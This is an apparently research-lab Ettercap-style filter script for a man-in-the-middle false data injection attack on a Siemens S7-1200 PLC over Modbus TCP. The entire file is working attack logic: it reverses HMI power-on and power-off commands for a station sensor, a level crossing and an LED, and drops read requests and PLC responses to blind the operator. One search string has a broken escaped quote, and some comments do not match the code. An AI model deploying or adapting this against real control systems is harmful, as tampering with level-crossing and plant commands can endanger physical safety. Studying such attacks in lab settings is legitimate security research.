#-----------------------------------------------------------------------------
# Name:        s71200 filter
#
# Purpose:     This filter is used to do the fake data injection attack for the 
#              Seimens S7-1200 PLC system.[PLC0: 192.168.10.73<-> 192.168.10.21]
# Author:      Yuancheng Liu
#
# Created:     2019/09/09
# Copyright:   YC @ Singtel Cyber Security Research & Development Laboratory
# License:     YC
#-----------------------------------------------------------------------------

#Reverse the memory change signal from HMI to PLC.
if (ip.proto == TCP  && tcp.dst == 502 && ip.dst == '192.168.10.73') {

    # Qx0.0-> Q0.0 station + sensor
    if (search(DATA.data ,"\x0f\x00\x00\x00\x01\x01\x00")) {
        replace("\x0f\x00\x00\x00\x01\x01\x00", "\x0f\x00\x00\x00\x01\x01\x01");
        msg("Reverse station + sensor power off request.\n");
        exit();
    }

    if (search(DATA.data ,"\x0f\x00\x00\x00\x01\x01\x01")) {
        replace("\x0f\x00\x00\x00\x01\x01\x01", "\x0f\x00\x00\x00\x01\x01\x00");
        msg("Reverse station + sensor power on request.\n");
        exit();

    }

    # Qx0.1-> Q0.1 level crossing pwr
    if (search(DATA.data ,"\x0f\x00\x01\x00\x01\x01\x00")) {
        replace("\x0f\x00\x01\x00\x01\x01\x00", "\x0f\x00\x01\x00\x01\x01\x01");
        msg("Reverse level crossing pwroff request.\n");
        exit();

    }
    if (search(DATA.data ,"\x0f\x00\x01\x00\x01\x01\x01")) {
        replace("\x0f\x00\x01\x00\x01\x01\x01", "\x0f\x00\x01\x00\x01\x01\x00");
        msg("Reverselevel crossing pwr on request.\n");
        exit();

    }

    # Qx0.2-> Q0.2 Resident LED
    if (search(DATA.data ,"\x0f\x00\x02\x00\x01\x01\x00")) {
        replace("\x0f\x00\x02\x00\x01\x01\x00", "\x0f\x00\x02\x00\x01\x01\x01");
        msg("Reverse Resident LED pwroff request.\n");
        exit();

    }
    if (search(DATA.data ,"\x0f\x00\x02\x00\x01\x01\x01")) {
        replace("\x0f\x00\x02\x00\x01\x01\x01", "\x0f\x00\x02\x00\x01\x01\x00");
        msg("Reverse Resident LED pwr on request.\n");
        exit();
    }

}

# Drop the memory change signal from HMI to PLC.
if (ip.proto == TCP  && tcp.dst == 502 && ip.dst == '192.168.10.73')  {
    # Drop the PLC response.
    if (search(DATA.data ,"\x00\x00\x00\x00\x00\x08\x01\x01")) {
        drop();
        msg("Drop the read request!\n");
    }
}

#Reverse the PLC response to HMI.
if (ip.proto == TCP && tcp.dst == 502 && ip.dst == '192.168.10.21') {
    # Drop the PLC response.
    if (search(DATA.data ,"\x01\x01\")) {
        drop();
        msg("Drop the response!\n");
    }
}
